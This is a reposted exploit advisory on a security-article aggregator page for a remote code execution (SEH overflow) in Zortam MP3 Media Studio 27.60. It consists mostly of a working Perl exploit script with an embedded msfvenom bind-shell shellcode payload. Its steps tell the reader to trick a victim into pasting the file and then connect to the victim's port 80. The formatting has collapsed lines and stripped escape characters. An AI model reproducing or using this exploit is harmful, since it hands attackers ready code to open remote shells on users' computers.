HackDig : Dig high-quality web security articles for hackers

Zortam MP3 Media Studio 27.60 Remote Code Execution

2020-11-21 04:51
# Exploit Title: Zortam Mp3 Media Studio 27.60 - Remote Code Execution (SEH)# Date: November 19, 2020# Exploit Author: Vincent Wolterman# Vendor Homepage: https://www.zortam.com/index.html# Software Link: https://www.zortam.com/download.html# Version: 27.60# Tested on: Windows 7 Professional SP 1 Build 7601; Windows 10 Professional Build 19041# Steps to reproduce crash:# 1) Run provided Perl code Zortam_MP3_Studio_poc.pl# 2) Open Zortam_Crash.txt output file# 3) Copy contents of text file to clipboard# 4) Open Zortam Mp3 Studio# 5) From the Menu bar -> File -> New Library# 6) Click ‘OK’ when prompted ‘Do you want to create a new Mp3 library?’# 7) Paste the contents of Zortam_Crash.txt into the ‘Select Folder’ field# 8) Click 'OK'# 9) Connect to victim machine on port 80#!/usr/bin/perl$baddata = "Metal's_Greatest_Hits"; # you can put whatever you need to here to convince victim (will be seen during crash)$baddata .= "x90" x (268-length($baddata)); # exact overwrite at 272$nseh = "xebx0bx90x90"; # nseh overwrite JMP short 11 bytes into NOP sled# 0x10015962 : pop ecx # pop esi # ret  | ascii {PAGE_EXECUTE_READ} [WNASPI32.DLL] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v2.0.1.50# (C:Program FilesZortam Mp3 Media StudioWNASPI32.DLL)$seh = "x62x59x01x10"; # seh overwrite$nop = "x90" x 12; # NOP sled# msfvenom -p windows/shell_bind_tcp LPORT=80 -b "x00x0ax0d" -f perl -v payload EXITFUNC=seh# Payload size: 355 bytes$payload ="xd9xcfxbfxadx91xa4xe3xd9x74x24xf4x5ax29xc9" ."xb1x53x83xc2x04x31x7ax13x03xd7x82x46x16xdb" ."x4dx04xd9x23x8ex69x53xc6xbfxa9x07x83x90x19" ."x43xc1x1cxd1x01xf1x97x97x8dxf6x10x1dxe8x39" ."xa0x0exc8x58x22x4dx1dxbax1bx9ex50xbbx5cxc3" ."x99xe9x35x8fx0cx1dx31xc5x8cx96x09xcbx94x4b" ."xd9xeaxb5xdax51xb5x15xddxb6xcdx1fxc5xdbxe8" ."xd6x7ex2fx86xe8x56x61x67x46x97x4dx9ax96xd0" ."x6ax45xedx28x89xf8xf6xefxf3x26x72xebx54xac" ."x24xd7x65x61xb2x9cx6axcexb0xfax6exd1x15x71" ."x8ax5ax98x55x1ax18xbfx71x46xfaxdex20x22xad" ."xdfx32x8dx12x7ax39x20x46xf7x60x2dxabx3ax9a" ."xadxa3x4dxe9x9fx6cxe6x65xacxe5x20x72xd3xdf" ."x95xecx2axe0xe5x25xe9xb4xb5x5dxd8xb4x5dx9d" ."xe5x60xcbx95x40xdbxeex58x32x8bxaexf2xdbxc1" ."x20x2dxfbxe9xeax46x94x17x15x68x35x91xf3x02" ."xa5xf7xacxbax07x2cx65x5dx77x06xddxc9x30x40" ."xdaxf6xc0x46x4cx60x4bx85x48x91x4cx80xf8xc6" ."xdbx5ex69xa5x7ax5exa0x5dx1excdx2fx9dx69xee" ."xe7xcax3exc0xf1x9exd2x7bxa8xbcx2ex1dx93x04" ."xf5xdex1ax85x78x5ax39x95x44x63x05xc1x18x32" ."xd3xbfxdexecx95x69x89x43x7cxfdx4cxa8xbfx7b" ."x51xe5x49x63xe0x50x0cx9cxcdx34x98xe5x33xa5" ."x67x3cxf0xdbx96x8cxedx4cx01x65x4cx11xb2x50" ."x93x2cx31x50x6cxcbx29x11x69x97xedxcax03x88" ."x9bxecxb0xa9x89";$file = "Zortam_Crash.txt";open (FILE, '>Zortam_Crash.txt');print FILE $baddata;print FILE $nseh;print FILE $seh;print FILE $nop;print FILE $payload;close (FILE);print "Exploit file created [" . $file . "]n";print "Buffer size: " . length($baddata) . "n";


Source: 2610110202-BLW/eussi/moc.ytirucesxc

Read:194 | Comments:0 | Tags:No Tag

“Zortam MP3 Media Studio 27.60 Remote Code Execution”0 Comments

Submit A Comment

Name:

Email:

Blog :

Verification Code:

Tools